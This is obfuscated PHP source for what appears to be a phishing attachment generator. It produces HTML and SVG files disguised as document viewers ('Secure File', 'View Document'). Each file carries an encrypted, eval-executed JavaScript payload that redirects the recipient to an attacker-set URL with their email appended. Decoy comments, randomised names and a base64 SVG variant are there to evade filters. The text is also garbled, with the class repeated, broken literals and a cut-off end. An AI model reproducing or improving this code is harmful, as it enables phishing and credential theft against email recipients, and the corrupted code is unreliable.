class ChaCha { private $a2962; private $C5fcf; private $D96da; public function __construct($a4c91, $Ec631) { goto dc0dc; A55b8: $this->D96da = $this->generateRandomVars(); goto A1001; Ca698: $this->C5fcf = $Ec631; goto A55b8; dc0dc: $this->a2962 = $a4c91; goto Ca698; A1001: } public function encode($c43ea) { goto Ef11c; F41ff: $f0333 = $this->fibShuffle($cb819, $a5077); goto Ab7fd; ecab9: $c5587 = dechex($a4f6d) . . dechex($a5077) . . dechex($b6302) . . dechex(strlen($c43ea)); goto bd570; Cefab: $a5077 = $this->quarterRound($a4f6d, $Da579 ^ $D8293); goto Dc885; ee820: $f719b = bin2hex($c9007); goto ecab9; B28a0: $a4f6d = $this->quarterRound($Da579, $D8293); goto Cefab; F04b5: $D8293 = time() % 65536; goto B28a0; E5cda: $Da579 = mt_rand(100000, 999999); goto F04b5; Ab7fd: $c9007 = $this->primeSpiral($f0333, $b6302); goto ee820; b097f: return ''; goto C629d; C629d: C519f: goto E5cda; Dc885: $b6302 = $this->quarterRound($a5077, strlen($c43ea) * 7919); goto B609b; B609b: $cb819 = $this->chachaXor($c43ea, $a4f6d, $a5077); goto F41ff; Ef11c: if (!empty($c43ea)) { goto C519f; } goto b097f; bd570: return $f719b . "|" . $c5587; goto Dd6c5; Dd6c5: } private function quarterRound($D96d6, $Bf5e1) { goto df2b9; a75db: return $D96d6; goto C216b; cccca: $D96d6 = ($D96d6 ^ $Bf5e1) & 0xffffffff; goto C3f59; df2b9: $D96d6 = $D96d6 + $Bf5e1 & 0xffffffff; goto f7cd6; f7cd6: $D96d6 = ($D96d6 << 7 | $D96d6 >> 25) & 0xffffffff; goto cccca; C3f59: $D96d6 = ($D96d6 << 12 | $D96d6 >> 20) & 0xffffffff; goto a75db; C216b: } private function chachaXor($E3272, $a4f6d, $a5077) { goto Df915; C4f80: $c6dae = [$a4f6d, $a5077, $a4f6d ^ $a5077, $a4f6d + $a5077 & 0xffffffff]; goto e3b4e; f9996: if (!($C511c < strlen($E3272))) { goto De71f; } goto b62b2; b62b2: $B5c32 = $C511c % 4; goto A272a; c703e: fb285: goto Fac4b; e3b4e: $C511c = 0; goto e166f; c9841: De71f: goto cc0c4; b50a5: goto De0a4; goto c9841; Fac4b: $C511c++; goto b50a5; Df915: $afdd9 = ''; goto C4f80; c8c8e: $a1628 = ($c6dae[$B5c32] ^ $c6dae[($B5c32 + 2) % 4]) & 0xff; goto B3108; A272a: $c6dae[$B5c32] = $c6dae[$B5c32] + $c6dae[($B5c32 + 1) % 4] & 0xffffffff; goto b5892; cc0c4: return $afdd9; goto A0ce7; b5892: $c6dae[$B5c32] = ($c6dae[$B5c32] << 8 | $c6dae[$B5c32] >> 24) & 0xffffffff; goto c8c8e; e166f: De0a4: goto f9996; B3108: $afdd9 .= chr(ord($E3272[$C511c]) ^ $a1628); goto c703e; A0ce7: } private function fibShuffle($E3272, $E4e1b) { goto cda56; F8c70: b2309: goto F68ee; Bb89e: $c9466 = ord($E3272[$C511c]); goto Dddff; b01bf: b63a1: goto De95d; cda56: $afdd9 = ''; goto Fc80a; F0512: b2cd4: goto cbf56; D5829: Af01f: goto c5de2; F3ccd: $d50a4 = ($C511c + $E4e1b % 17) % count($B7777); goto c8d54; Fec3b: $C511c = 2; goto F8c70; aab20: $C511c++; goto a7296; d1a71: $C511c = 0; goto b01bf; cbf56: return $afdd9; goto cc673; b319f: $D5dc9 ^= $B7777[($d50a4 + 3) % count($B7777)]; goto Eb957; F68ee: if (!($C511c < 20)) { goto c95d2; } goto febae; Fc80a: $B7777 = [1, 1]; goto Fec3b; fc9d0: goto b2309; goto B9621; Eb957: $afdd9 .= chr($D5dc9); goto Bd67f; c8d54: $d99e1 = $B7777[$d50a4] % 8; goto Bb89e; c5de2: $C511c++; goto fc9d0; B9621: c95d2: goto d1a71; Bd67f: d4e46: goto aab20; De95d: if (!($C511c < strlen($E3272))) { goto b2cd4; } goto F3ccd; Dddff: $D5dc9 = ($c9466 << $d99e1 | $c9466 >> 8 - $d99e1) & 0xff; goto b319f; febae: $B7777[$C511c] = ($B7777[$C511c - 1] + $B7777[$C511c - 2]) % 256; goto D5829; a7296: goto b63a1; goto F0512; cc673: } private function primeSpiral($E3272, $E4e1b) { goto C4e34; A999a: return $afdd9; goto D1f75; A9395: $De69e = ($De69e * $Fc921[$c4066] + $Fc921[($c4066 + 7) % count($Fc921)]) % 65536; goto f977a; F09ed: $C7144 = range(0, 255); goto F614f; F614f: $De69e = $E4e1b; goto afc3a; Ffef2: $C7144[$C511c] = $C7144[$f6432]; goto Dda0b; Afc1e: $afdd9 .= chr($C7144[ord($E3272[$C511c])]); goto f7500; afc3a: $C511c = 255; goto ac743; c80be: goto b3e99; goto c7d3b; Dda0b: $C7144[$f6432] = $Bce68; goto d2a83; dc517: $Bce68 = $C7144[$C511c]; goto Ffef2; bfc84: if (!($C511c > 0)) { goto f43f8; } goto Dd2a3; C4e34: $Fc921 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71]; goto E256f; ac743: Bc1a2: goto bfc84; d2a83: F7b58: goto a294a; bfbb0: if (!($C511c < strlen($E3272))) { goto aa070; } goto Afc1e; f977a: $f6432 = $De69e % ($C511c + 1); goto dc517; E5d59: $C511c++; goto c80be; f7500: E341d: goto E5d59; dd4cb: goto Bc1a2; goto E03f0; a294a: $C511c--; goto dd4cb; c7d3b: aa070: goto A999a; E03f0: f43f8: goto F0fe6; C4915: b3e99: goto bfbb0; Dd2a3: $c4066 = $C511c % count($Fc921); goto A9395; E256f: $afdd9 = ''; goto F09ed; F0fe6: $C511c = 0; goto C4915; D1f75: } private function interleaveRotate($E3272, $E4e1b) { goto ab6ba; db999: if (!(ord($afdd9[$Decb8]) !== 0 && $C511c < $A2286 - 1)) { goto dc11a; } goto C177d; d2cfe: $afdd9[$Decb8] = chr($bfb60); goto F81c0; Cd2ac: return $E3272; goto b6e7c; fbd79: $Decb8 = ($f9510 + $Daaeb) % $A2286; goto d983a; Fcab0: goto A556c; goto C87de; F0f11: $bfb60 = ($c9466 << $Bfc15 | $c9466 >> 8 - $Bfc15) & 0xff; goto d2cfe; B4890: $C511c++; goto a3120; B79be: $c9466 = ord($E3272[$C511c]); goto e8e5a; a3120: goto f9792; goto d6045; fefa5: if (!($A2286 < 2)) { goto C7225; } goto Cd2ac; ab6ba: $A2286 = strlen($E3272); goto fefa5; C87de: dc11a: goto B79be; badb2: return $afdd9; goto D9e4b; F81c0: $f9510 = $Decb8; goto b1a40; e2719: if (!($C511c < $A2286)) { goto Ac1ae; } goto fbd79; d983a: A556c: goto db999; e8e5a: $Bfc15 = $E4e1b >> $C511c % 8 & 7; goto F0f11; bae0a: $C511c = 0; goto D239d; C177d: $Decb8 = ($Decb8 + 1) % $A2286; goto Fcab0; d6045: Ac1ae: goto badb2; D239d: f9792: goto e2719; b6e7c: C7225: goto B2e88; a225f: $Daaeb = $E4e1b % 7 + 3; goto bae0a; B0c90: $f9510 = 0; goto a225f; b1a40: Fba9f: goto B4890; B2e88: $afdd9 = str_repeat("\x0", $A2286); goto B0c90; D9e4b: } private function generateRandomVars() { goto d31eb; aad1f: $D1a40 = substr(md5(mt_rand()), 0, 4); goto D530b; B09e7: $Fc8e7 = ["ld", "ui", "vw", "dc", "pg"][array_rand(["ld", "ui", "vw", "dc", "pg"])]; goto aad1f; bff0e: return ["el" => $fb7e1[0], "dt" => $fb7e1[1], "mt" => $fb7e1[2], "em" => $fb7e1[3], "k1" => $fb7e1[4], "k2" => $fb7e1[5], "k3" => $fb7e1[6], "ln" => $fb7e1[7], "st" => $fb7e1[8], "bx" => $fb7e1[9], "fb" => $fb7e1[10], "pm" => $fb7e1[11], "mp" => $fb7e1[12], "rs" => $fb7e1[13], "tp" => $fb7e1[14], "ix" => $fb7e1[15], "jx" => $fb7e1[16], "ch" => $fb7e1[17], "rt" => $fb7e1[18], "fn" => $fb7e1[19], "ex" => $fb7e1[20], "sd" => $fb7e1[21], "bf" => $fb7e1[22], "sh" => $fb7e1[23], "ps" => $fb7e1[24], "nr" => $fb7e1[25], "className" => $Fc8e7 . "-" . $D1a40, "dataAttr" => $ff51f[array_rand($ff51f)], "metaAttr" => $ff51f[array_rand($ff51f)] . "m", "emailAttr" => $ff51f[array_rand($ff51f)] . "u", "title" => $D6af1[array_rand($D6af1)]]; goto aa6e3; d31eb: $fb7e1 = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "xa", "xb", "xc", "xd", "xe", "xf", "xg", "xh", "xi", "xj", "xk", "ya", "yb", "yc", "yd", "ye", "yf", "yg", "yh", "yi", "yj", "yk", "za", "zb", "zc", "zd", "ze", "zf", "zg", "zh", "zi", "zj", "zk"]; goto C157d; C157d: shuffle($fb7e1); goto B09e7; F055c: $D6af1 = ["View Document", "Open File", "Document", "Preview", "File Viewer", "Secure File", "Access File", "Document Access"]; goto bff0e; D530b: $ff51f = ["data-v", "data-x", "data-r", "data-c", "data-s"]; goto F055c; aa6e3: } public function generateHTML() { goto F421e; D2ab3: $f719b = $this->encode($Db98c); goto f2886; bacee: echo $this->buildHTML($f719b); goto Bc819; ee215: header("Pragma: no-cache"); goto ae8ef; ae8ef: header("Expires: 0"); goto bacee; A61a4: header("Content-Type: text/html; charset=UTF-8"); goto E629f; F421e: $Db98c = "window.location.href="" . $this->a2962 . "/"+"" . $this->C5fcf . "";"; goto D2ab3; f2886: $a24fb = "doc-" . bin2hex(random_bytes(4)) . ".html"; goto A61a4; cf936: header("Cache-Control: no-cache, no-store, must-revalidate"); goto ee215; E629f: header("Content-Disposition: attachment; filename="" . $a24fb . """); goto cf936; Bc819: } public function generateSVG() { goto A066d; b7b97: $f719b = $this->encode($Db98c); goto F3368; A066d: $Db98c = "window.location.href="" . $this->a2962 . "/"+"" . $this->C5fcf . "";"; goto b7b97; f3214: header("Cache-Control: no-cache, no-store, must-revalidate"); goto F777e; F3368: $a24fb = "img-" . bin2hex(random_bytes(4)) . ".svg"; goto C5080; F777e: header("Pragma: no-cache"); goto c5361; f7980: echo $this->buildSVG($f719b); goto Fca7e; e0e89: header("Content-Disposition: attachment; filename="" . $a24fb . """); goto f3214; C5080: header("Content-Type: image/svg+xml; charset=UTF-8"); goto e0e89; c5361: header("Expires: 0"); goto f7980; Fca7e: } public function generateBase64SVG() { goto b7c68; a8064: header("Cache-Control: no-cache, no-store, must-revalidate"); goto Dfa81; fbb91: header("Expires: 0"); goto c1e8b; c1e8b: echo $this->buildBase64SVG($this->C5fcf); goto Ac82b; Bc321: header("Content-Disposition: attachment; filename="" . $a24fb . """); goto a8064; fa961: header("Content-Type: image/svg+xml; charset=UTF-8"); goto Bc321; Dfa81: header("Pragma: no-cache"); goto fbb91; b7c68: $a24fb = "document-" . bin2hex(random_bytes(4)) . ".svg"; goto fa961; Ac82b: } private function buildHTML($f719b) { goto E92e1; E143c: list($Db98c, $F5352) = explode("|", $f719b); goto b6df3; E92e1: $a834c = $this->D96da; goto E143c; b6df3: $e3670 = $this->generateDecoder($a834c); goto d4aec; d4aec: return "<!DOCTYPE html>\xa<html>
<head>
<meta charset="UTF-8">\xa <meta name="viewport" content="width=device-width,initial-scale=1">\xa <title>" . $a834c["title"] . "</title>
<style>\xa *{margin:0;padding:0}body{height:0vh;display:flex;align-items:center;justify-content:center}\xa ." . $a834c["className"] . "{width:40px;height:40px;border:3px solid #ddd;border-top-color:#999;border-radius:50%;animation:s 1s linear infinite}
@keyframes s{to{transform:rotate(360deg)}}\xa .h{position:absolute;left:-9999px;opacity}\xa </style>
</head>\xa<body>\xa <div class="" . $a834c["className"] . ""></div>
<div class="h" " . $a834c["dataAttr"] . "="" . htmlspecialchars($Db98c) . "" " . $a834c["metaAttr"] . "="" . htmlspecialchars($F5352) . "" " . $a834c["emailAttr"] . "="" . htmlspecialchars($this->C5fcf) . ""></div>\xa <script>" . $e3670 . "</script>
</body>
</html>"; goto abd4a; abd4a: } private function buildSVG($f719b) { goto F1bfc; F1bfc: $a834c = $this->D96da; goto cd915; Cc34e: return "xml version="1.0" encoding="UTF-8"\xa<svg xmlns="http://www.w3.org/20/svg" width="400" height="300" viewBox= 0">
<rect width="0" height="0" fill="none"/>\xa <circle cx="200" cy=50" r=5" fill="none" stroke="#ddd" stroke-width="2" stroke-dasharray=0" opacity=.3">
<animateTransform attributeName="transform" type="rotate" from="0 0" to="360 200 1" dur=s" repeatCount="indefinite"/>
</circle>
<foreignObject width=" height="1" x="-9999" y="-9999">
<div xmlns="http://www.w3.orgy999/xhtml" " . $a834c["dataAttr"] . "="" . htmlspecialchars($Db98c) . "" " . $a834c["metaAttr"] . "="" . htmlspecialchars($F5352) . "" " . $a834c["emailAttr"] . "="" . htmlspecialchars($this->C5fcf) . ""></div>
</foreignObject>
<script type="text/javascript"><![CDATA[" . $e3670 . "]]></script>\xa</svg>"; goto C2f05; aae6c: $e3670 = $this->generateDecoder($a834c); goto Cc34e; cd915: list($Db98c, $F5352) = explode("|", $f719b); goto aae6c; C2f05: } private function buildBase64SVG($Ebc57) { goto a0c1c; E9f03: $d28ae = base64_encode($da3a3); goto C1a81; C1a81: return "xml version=.0" encoding="UTF-8"
<svg xmlns="http://www.w3.org/2000/svg" width="4" height="0" viewBox= 0 000">\xa <rect width="400" height="0" fill="none"/>
<circle cx="0" cy=50" r="20" fill="none" opacity="0.2"/>\xa <foreignObject width="0" height="0">
<body xmlns="http://www.w3.orgy999/xhtml">
<script>window." . $a834c["em"] . "='" . $Ebc57 . "';</script>
<script src="data:application/ecmascript;base64," . $d28ae . ""></script>
</body>\xa </foreignObject>
</svg>"; goto bc001; a0c1c: $a834c = $this->D96da; goto E9523; E9523: $da3a3 = "(function(){var " . $a834c["dt"] . "=window." . $a834c["em"] . "||"";if(" . $a834c["dt"] . ")window.location.href="" . $this->a2962 . "/"+" . $a834c["dt"] . ";})();"; goto E9f03; bc001: } private function generateDecoder($a834c) { goto D6e58; d4edd: Ac140: goto f3c0f; B7d1d: $a80c5 = ["// Analytics initialization", "// Configuration loader", "// Data processor", "// Content validator", "// Resource handler", "// Module initializer"]; goto E1bec; D6e58: $F8305 = "constructor"; goto c9043; e25e3: $Ec3a6 = mt_rand(1, 3); goto Debb4; Cb330: foreach ($B07f6 as $F096c) { $ecd18[] = "\u00" . dechex(ord($F096c)); B064e: } goto b6bd1; Cfe1e: goto d29d9; goto Ae3d8; D7aaa: foreach ($B07f6 as $F096c) { $ecd18[] = "\" . decoct(ord($F096c)); a5eea: } goto b1f3e; f4eac: $caef5 = ["from", "Char", "Code"]; goto B7d1d; e98ae: bc254: goto Cb330; f3c0f: $f478a = """ . implode('', $ecd18) . """; goto B646f; c6763: $f478a = """ . implode('', $ecd18) . """; goto B9008; A0ac7: $ecd18 = []; goto e25e3; adec9: foreach ($B07f6 as $F096c) { $ecd18[] = "\x" . dechex(ord($F096c)); D89b8: } goto d4edd; E0f7f: C9768: goto Cfe1e; b1f3e: E83c5: goto c6763; B9008: goto C9768; goto e98ae; Ffa36: return "(function(){
" . $abd21 . "
var " . $a834c["el"] . "=document.querySelector("[" . $a834c["dataAttr"] . "]");
if(!" . $a834c["el"] . ")return;\xavar " . $a834c["nr"] . "="" . $bbd31[0] . ""+("" . $bbd31[1] . ""+"" . $bbd31[2] . "");\xavar " . $a834c["dt"] . "=" . $a834c["el"] . "[" . $a834c["nr"] . "]("" . $a834c["dataAttr"] . "")||"";
var " . $a834c["mt"] . "=" . $a834c["el"] . "[" . $a834c["nr"] . "]("" . $a834c["metaAttr"] . "")||"";
var " . $a834c["em"] . "=" . $a834c["el"] . "[" . $a834c["nr"] . "]("" . $a834c["emailAttr"] . "")||"";
if(!" . $a834c["dt"] . "||!" . $a834c["mt"] . ")return;
try{\xavar " . $a834c["ps"] . "=" . $a834c["mt"] . ".split();
var " . $a834c["k1"] . "=parseInt(" . $a834c["ps"] . "[0],16);\xavar " . $a834c["k2"] . "=parseInt(" . $a834c["ps"] . "[1],);\xavar " . $a834c["k3"] . "=parseInt(" . $a834c["ps"] . "[2]a6);
var " . $a834c["ln"] . "=parseInt(" . $a834c["ps"] . "[3],16);\xavar " . $a834c["bx"] . "=[];\xafor(var " . $a834c["ix"] . ";" . $a834c["ix"] . "<" . $a834c["dt"] . ".length;" . $a834c["ix"] . "+){
" . $a834c["bx"] . ".push(parseInt(" . $a834c["dt"] . ".substr(" . $a834c["ix"] . "b),16));}
var " . $a834c["pm"] . "=[2c,5g,11,13,17a9b3,29,31,,41d3d7e3e9f1,67,71];
var " . $a834c["mp"] . "=[];\xafor(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<256;" . $a834c["ix"] . "++){" . $a834c["mp"] . "[" . $a834c["ix"] . "]=" . $a834c["ix"] . ";}
var " . $a834c["sd"] . "=" . $a834c["k3"] . ";
for(var " . $a834c["ix"] . "55;" . $a834c["ix"] . ";" . $a834c["ix"] . "--){
var " . $a834c["ch"] . "=" . $a834c["ix"] . "%" . $a834c["pm"] . ".length;
" . $a834c["sd"] . "=(" . $a834c["sd"] . "*" . $a834c["pm"] . "[" . $a834c["ch"] . "]+" . $a834c["pm"] . "[(" . $a834c["ch"] . "_)%" . $a834c["pm"] . ".length])%536;
var " . $a834c["jx"] . "=" . $a834c["sd"] . "%(" . $a834c["ix"] . "+1);\xavar " . $a834c["tp"] . "=" . $a834c["mp"] . "[" . $a834c["ix"] . "];" . $a834c["mp"] . "[" . $a834c["ix"] . "]=" . $a834c["mp"] . "[" . $a834c["jx"] . "];" . $a834c["mp"] . "[" . $a834c["jx"] . "]=" . $a834c["tp"] . ";}
var " . $a834c["sh"] . "=new Array(2);
for(var " . $a834c["ix"] . ";" . $a834c["ix"] . "<6;" . $a834c["ix"] . "++){" . $a834c["sh"] . "[" . $a834c["mp"] . "[" . $a834c["ix"] . "]]=" . $a834c["ix"] . ";}\xafor(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<" . $a834c["bx"] . ".length;" . $a834c["ix"] . "++){" . $a834c["bx"] . "[" . $a834c["ix"] . "]=" . $a834c["sh"] . "[" . $a834c["bx"] . "[" . $a834c["ix"] . "]];}
var " . $a834c["fb"] . "=[1,1];\xafor(var " . $a834c["ix"] . "=2;" . $a834c["ix"] . "0;" . $a834c["ix"] . "++){" . $a834c["fb"] . "[" . $a834c["ix"] . "]=(" . $a834c["fb"] . "[" . $a834c["ix"] . "-1]+" . $a834c["fb"] . "[" . $a834c["ix"] . "-2])*56;}\xafor(var " . $a834c["ix"] . ";" . $a834c["ix"] . "<" . $a834c["bx"] . ".length;" . $a834c["ix"] . "++){
var " . $a834c["ch"] . "=(" . $a834c["ix"] . "+(" . $a834c["k2"] . ")7))%" . $a834c["fb"] . ".length;
" . $a834c["bx"] . "[" . $a834c["ix"] . "]^=" . $a834c["fb"] . "[(" . $a834c["ch"] . "+3)%" . $a834c["fb"] . ".length];\xavar " . $a834c["sh"] . "=" . $a834c["fb"] . "[" . $a834c["ch"] . "]%8;
var " . $a834c["bf"] . "=" . $a834c["bx"] . "[" . $a834c["ix"] . "];
" . $a834c["bx"] . "[" . $a834c["ix"] . "]=((" . $a834c["bf"] . ">>" . $a834c["sh"] . ")|(" . $a834c["bf"] . "<<(8-" . $a834c["sh"] . ")))&5;}\xavar " . $a834c["st"] . "=[" . $a834c["k1"] . "," . $a834c["k2"] . "," . $a834c["k1"] . "^" . $a834c["k2"] . ",(" . $a834c["k1"] . "+" . $a834c["k2"] . ")&0xFFFFFFFF];\xafor(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<" . $a834c["bx"] . ".length;" . $a834c["ix"] . "++){
var " . $a834c["ch"] . "=" . $a834c["ix"] . ",;
" . $a834c["st"] . "[" . $a834c["ch"] . "]=(" . $a834c["st"] . "[" . $a834c["ch"] . "]+" . $a834c["st"] . "[(" . $a834c["ch"] . "Y),])&0xFFFFFFFF;
" . $a834c["st"] . "[" . $a834c["ch"] . "]=((" . $a834c["st"] . "[" . $a834c["ch"] . "]<<8)|(" . $a834c["st"] . "[" . $a834c["ch"] . "]>>4))&0xFFFFFFFF;\xavar " . $a834c["bf"] . "=(" . $a834c["st"] . "[" . $a834c["ch"] . "]^" . $a834c["st"] . "[(" . $a834c["ch"] . "+2)%4])&5;\xa" . $a834c["bx"] . "[" . $a834c["ix"] . "]^=" . $a834c["bf"] . ";}
var " . $a834c["fn"] . "="";\xavar " . $a834c["rt"] . "=String["" . $caef5[0] . ""+("" . $caef5[1] . ""+"" . $caef5[2] . "")];\xafor(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<" . $a834c["ln"] . ";" . $a834c["ix"] . "++){" . $a834c["fn"] . "+=" . $a834c["rt"] . "(" . $a834c["bx"] . "[" . $a834c["ix"] . "]);}\xavar " . $a834c["tp"] . "=" . $f478a . ";
var " . $a834c["sd"] . "=""[" . $a834c["tp"] . "][" . $a834c["tp"] . "](" . $a834c["fn"] . ");
" . $a834c["sd"] . "();
}catch(e){}})();"; goto ef9e9; c9043: $B07f6 = str_split($F8305); goto A0ac7; Debb4: if ($Ec3a6 == 1) { goto a27cb; } goto Afd13; E1bec: $abd21 = $a80c5[array_rand($a80c5)]; goto Ffa36; Ec2e6: $bbd31 = ["get", "Attr", "ibute"]; goto f4eac; B646f: d29d9: goto Ec2e6; b6bd1: edc8e: goto c023a; c023a: $f478a = """ . implode('', $ecd18) . """; goto E0f7f; Ae3d8: a27cb: goto adec9; Afd13: if ($Ec3a6 == 2) { goto bc254; } goto D7aaa; ef9e9: } }
class ChaCha { private $a2962; private $C5fcf; private $D96da; public function __construct($a4c91, $Ec631) { goto dc0dc; A55b8: $this->D96da = $this->generateRandomVars(); goto A1001; Ca698: $this->C5fcf = $Ec631; goto A55b8; dc0dc: $this->a2962 = $a4c91; goto Ca698; A1001: } public function encode($c43ea) { goto Ef11c; F41ff: $f0333 = $this->fibShuffle($cb819, $a5077); goto Ab7fd; ecab9: $c5587 = dechex($a4f6d) . . dechex($a5077) . . dechex($b6302) . . dechex(strlen($c43ea)); goto bd570; Cefab: $a5077 = $this->quarterRound($a4f6d, $Da579 ^ $D8293); goto Dc885; ee820: $f719b = bin2hex($c9007); goto ecab9; B28a0: $a4f6d = $this->quarterRound($Da579, $D8293); goto Cefab; F04b5: $D8293 = time() % 65536; goto B28a0; E5cda: $Da579 = mt_rand(100000, 999999); goto F04b5; Ab7fd: $c9007 = $this->primeSpiral($f0333, $b6302); goto ee820; b097f: return ''; goto C629d; C629d: C519f: goto E5cda; Dc885: $b6302 = $this->quarterRound($a5077, strlen($c43ea) * 7919); goto B609b; B609b: $cb819 = $this->chachaXor($c43ea, $a4f6d, $a5077); goto F41ff; Ef11c: if (!empty($c43ea)) { goto C519f; } goto b097f; bd570: return $f719b . "|" . $c5587; goto Dd6c5; Dd6c5: } private function quarterRound($D96d6, $Bf5e1) { goto df2b9; a75db: return $D96d6; goto C216b; cccca: $D96d6 = ($D96d6 ^ $Bf5e1) & 0xffffffff; goto C3f59; df2b9: $D96d6 = $D96d6 + $Bf5e1 & 0xffffffff; goto f7cd6; f7cd6: $D96d6 = ($D96d6 << 7 | $D96d6 >> 25) & 0xffffffff; goto cccca; C3f59: $D96d6 = ($D96d6 << 12 | $D96d6 >> 20) & 0xffffffff; goto a75db; C216b: } private function chachaXor($E3272, $a4f6d, $a5077) { goto Df915; C4f80: $c6dae = [$a4f6d, $a5077, $a4f6d ^ $a5077, $a4f6d + $a5077 & 0xffffffff]; goto e3b4e; f9996: if (!($C511c < strlen($E3272))) { goto De71f; } goto b62b2; b62b2: $B5c32 = $C511c % 4; goto A272a; c703e: fb285: goto Fac4b; e3b4e: $C511c = 0; goto e166f; c9841: De71f: goto cc0c4; b50a5: goto De0a4; goto c9841; Fac4b: $C511c++; goto b50a5; Df915: $afdd9 = ''; goto C4f80; c8c8e: $a1628 = ($c6dae[$B5c32] ^ $c6dae[($B5c32 + 2) % 4]) & 0xff; goto B3108; A272a: $c6dae[$B5c32] = $c6dae[$B5c32] + $c6dae[($B5c32 + 1) % 4] & 0xffffffff; goto b5892; cc0c4: return $afdd9; goto A0ce7; b5892: $c6dae[$B5c32] = ($c6dae[$B5c32] << 8 | $c6dae[$B5c32] >> 24) & 0xffffffff; goto c8c8e; e166f: De0a4: goto f9996; B3108: $afdd9 .= chr(ord($E3272[$C511c]) ^ $a1628); goto c703e; A0ce7: } private function fibShuffle($E3272, $E4e1b) { goto cda56; F8c70: b2309: goto F68ee; Bb89e: $c9466 = ord($E3272[$C511c]); goto Dddff; b01bf: b63a1: goto De95d; cda56: $afdd9 = ''; goto Fc80a; F0512: b2cd4: goto cbf56; D5829: Af01f: goto c5de2; F3ccd: $d50a4 = ($C511c + $E4e1b % 17) % count($B7777); goto c8d54; Fec3b: $C511c = 2; goto F8c70; aab20: $C511c++; goto a7296; d1a71: $C511c = 0; goto b01bf; cbf56: return $afdd9; goto cc673; b319f: $D5dc9 ^= $B7777[($d50a4 + 3) % count($B7777)]; goto Eb957; F68ee: if (!($C511c < 20)) { goto c95d2; } goto febae; Fc80a: $B7777 = [1, 1]; goto Fec3b; fc9d0: goto b2309; goto B9621; Eb957: $afdd9 .= chr($D5dc9); goto Bd67f; c8d54: $d99e1 = $B7777[$d50a4] % 8; goto Bb89e; c5de2: $C511c++; goto fc9d0; B9621: c95d2: goto d1a71; Bd67f: d4e46: goto aab20; De95d: if (!($C511c < strlen($E3272))) { goto b2cd4; } goto F3ccd; Dddff: $D5dc9 = ($c9466 << $d99e1 | $c9466 >> 8 - $d99e1) & 0xff; goto b319f; febae: $B7777[$C511c] = ($B7777[$C511c - 1] + $B7777[$C511c - 2]) % 256; goto D5829; a7296: goto b63a1; goto F0512; cc673: } private function primeSpiral($E3272, $E4e1b) { goto C4e34; A999a: return $afdd9; goto D1f75; A9395: $De69e = ($De69e * $Fc921[$c4066] + $Fc921[($c4066 + 7) % count($Fc921)]) % 65536; goto f977a; F09ed: $C7144 = range(0, 255); goto F614f; F614f: $De69e = $E4e1b; goto afc3a; Ffef2: $C7144[$C511c] = $C7144[$f6432]; goto Dda0b; Afc1e: $afdd9 .= chr($C7144[ord($E3272[$C511c])]); goto f7500; afc3a: $C511c = 255; goto ac743; c80be: goto b3e99; goto c7d3b; Dda0b: $C7144[$f6432] = $Bce68; goto d2a83; dc517: $Bce68 = $C7144[$C511c]; goto Ffef2; bfc84: if (!($C511c > 0)) { goto f43f8; } goto Dd2a3; C4e34: $Fc921 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71]; goto E256f; ac743: Bc1a2: goto bfc84; d2a83: F7b58: goto a294a; bfbb0: if (!($C511c < strlen($E3272))) { goto aa070; } goto Afc1e; f977a: $f6432 = $De69e % ($C511c + 1); goto dc517; E5d59: $C511c++; goto c80be; f7500: E341d: goto E5d59; dd4cb: goto Bc1a2; goto E03f0; a294a: $C511c--; goto dd4cb; c7d3b: aa070: goto A999a; E03f0: f43f8: goto F0fe6; C4915: b3e99: goto bfbb0; Dd2a3: $c4066 = $C511c % count($Fc921); goto A9395; E256f: $afdd9 = ''; goto F09ed; F0fe6: $C511c = 0; goto C4915; D1f75: } private function interleaveRotate($E3272, $E4e1b) { goto ab6ba; db999: if (!(ord($afdd9[$Decb8]) !== 0 && $C511c < $A2286 - 1)) { goto dc11a; } goto C177d; d2cfe: $afdd9[$Decb8] = chr($bfb60); goto F81c0; Cd2ac: return $E3272; goto b6e7c; fbd79: $Decb8 = ($f9510 + $Daaeb) % $A2286; goto d983a; Fcab0: goto A556c; goto C87de; F0f11: $bfb60 = ($c9466 << $Bfc15 | $c9466 >> 8 - $Bfc15) & 0xff; goto d2cfe; B4890: $C511c++; goto a3120; B79be: $c9466 = ord($E3272[$C511c]); goto e8e5a; a3120: goto f9792; goto d6045; fefa5: if (!($A2286 < 2)) { goto C7225; } goto Cd2ac; ab6ba: $A2286 = strlen($E3272); goto fefa5; C87de: dc11a: goto B79be; badb2: return $afdd9; goto D9e4b; F81c0: $f9510 = $Decb8; goto b1a40; e2719: if (!($C511c < $A2286)) { goto Ac1ae; } goto fbd79; d983a: A556c: goto db999; e8e5a: $Bfc15 = $E4e1b >> $C511c % 8 & 7; goto F0f11; bae0a: $C511c = 0; goto D239d; C177d: $Decb8 = ($Decb8 + 1) % $A2286; goto Fcab0; d6045: Ac1ae: goto badb2; D239d: f9792: goto e2719; b6e7c: C7225: goto B2e88; a225f: $Daaeb = $E4e1b % 7 + 3; goto bae0a; B0c90: $f9510 = 0; goto a225f; b1a40: Fba9f: goto B4890; B2e88: $afdd9 = str_repeat("\x0", $A2286); goto B0c90; D9e4b: } private function generateRandomVars() { goto d31eb; aad1f: $D1a40 = substr(md5(mt_rand()), 0, 4); goto D530b; B09e7: $Fc8e7 = ["ld", "ui", "vw", "dc", "pg"][array_rand(["ld", "ui", "vw", "dc", "pg"])]; goto aad1f; bff0e: return ["el" => $fb7e1[0], "dt" => $fb7e1[1], "mt" => $fb7e1[2], "em" => $fb7e1[3], "k1" => $fb7e1[4], "k2" => $fb7e1[5], "k3" => $fb7e1[6], "ln" => $fb7e1[7], "st" => $fb7e1[8], "bx" => $fb7e1[9], "fb" => $fb7e1[10], "pm" => $fb7e1[11], "mp" => $fb7e1[12], "rs" => $fb7e1[13], "tp" => $fb7e1[14], "ix" => 